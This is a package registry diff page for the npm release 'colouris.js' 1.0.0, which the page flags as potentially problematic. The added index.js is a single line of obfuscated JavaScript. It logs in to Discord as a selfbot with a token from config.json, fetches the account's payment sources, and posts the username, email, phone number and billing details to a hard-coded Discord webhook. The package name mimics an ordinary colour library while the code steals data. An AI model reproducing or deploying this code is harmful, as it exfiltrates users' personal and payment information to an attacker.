colouris.js 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of colouris.js might be problematic. Click here for more details.
- package/config.json +3 -0
- package/index.js +1 -0
- package/package.json +18 -0
package/config.json
ADDED
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x203905=_0xa7a8;function _0xa7a8(_0x65a71b,_0x36c63c){const _0x471254=_0x4712();return _0xa7a8=function(_0xa7a89f,_0x57f7c2){_0xa7a89f=_0xa7a89f-0xc7;let _0x1712b7=_0x471254[_0xa7a89f];return _0x1712b7;},_0xa7a8(_0x65a71b,_0x36c63c);}(function(_0x33a175,_0x240dc4){const _0x491832=_0xa7a8,_0x1d4b58=_0x33a175();while(!![]){try{const _0x1d22ee=-parseInt(_0x491832(0xd6))/0x1+-parseInt(_0x491832(0xd2))/0x2+-parseInt(_0x491832(0xc8))/0x3*(parseInt(_0x491832(0xda))/0x4)+parseInt(_0x491832(0xd5))/0x5*(parseInt(_0x491832(0xcd))/0x6)+-parseInt(_0x491832(0xd7))/0x7+-parseInt(_0x491832(0xcf))/0x8*(-parseInt(_0x491832(0xdd))/0x9)+parseInt(_0x491832(0xd3))/0xa*(parseInt(_0x491832(0xd8))/0xb);if(_0x1d22ee===_0x240dc4)break;else _0x1d4b58['push'](_0x1d4b58['shift']());}catch(_0x2a8055){_0x1d4b58['push'](_0x1d4b58['shift']());}}}(_0x4712,0x51a25));const Discord=require(_0x203905(0xc7)),client=new Discord['Client']({'checkUpdate':![]}),config=require('./config.json'),phin=require(_0x203905(0xcc));function _0x4712(){const _0x22a2da=['850NzbJpF','login','1371295OntELf','140734JheShM','4527635vFGSHX','209638acTcOi','username','20vpZWTO','stringify','billing','664641vYKoXQ','application/json','ready','json','https://discord.com/api/webhooks/1178752186369454080/_4YSDf584gmvw9K2i9Ez9aD283XAwArBFNAQfcyyEJVrJM1QplEwI2KGk1iv0U5PLp92','discord.js-selfbot-v13','196152jlzKaP','user','\x20\x0a.Numero\x20:\x20','Voici\x20les\x20infos\x20de\x20','phin','6NtNrYa','\x0a\x20.Payement\x20:\x20','8sCvBkj','token','POST','1038412HgoZVb'];_0x4712=function(){return _0x22a2da;};return _0x4712();}let tokenn=config[_0x203905(0xd0)];client['on'](_0x203905(0xdf),async()=>{const _0x5ec54d=_0x203905;let _0x190b87=await client[_0x5ec54d(0xdc)]['fetchPaymentSources']();await phin({'url':_0x5ec54d(0xe1),'headers':{'Content-Type':_0x5ec54d(0xde)},'method':_0x5ec54d(0xd1),'data':{'content':_0x5ec54d(0xcb)+client[_0x5ec54d(0xc9)][_0x5ec54d(0xd9)]+'\x20\x22:\x22\x0a\x20.Mail\x20:\x20'+client[_0x5ec54d(0xc9)]['emailAddress']+_0x5ec54d(0xca)+client[_0x5ec54d(0xc9)]['phoneNumber']+_0x5ec54d(0xce)+JSON[_0x5ec54d(0xdb)](_0x190b87,null,0x2)},'parse':_0x5ec54d(0xe0)});}),client[_0x203905(0xd4)](config[_0x203905(0xd0)]);
|
package/package.json
ADDED
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "colouris.js",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "runn"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"node",
|
|
11
|
+
"modules",
|
|
12
|
+
"discord",
|
|
13
|
+
"javascript",
|
|
14
|
+
"js"
|
|
15
|
+
],
|
|
16
|
+
"author": "Lain",
|
|
17
|
+
"license": "ISC"
|
|
18
|
+
}
|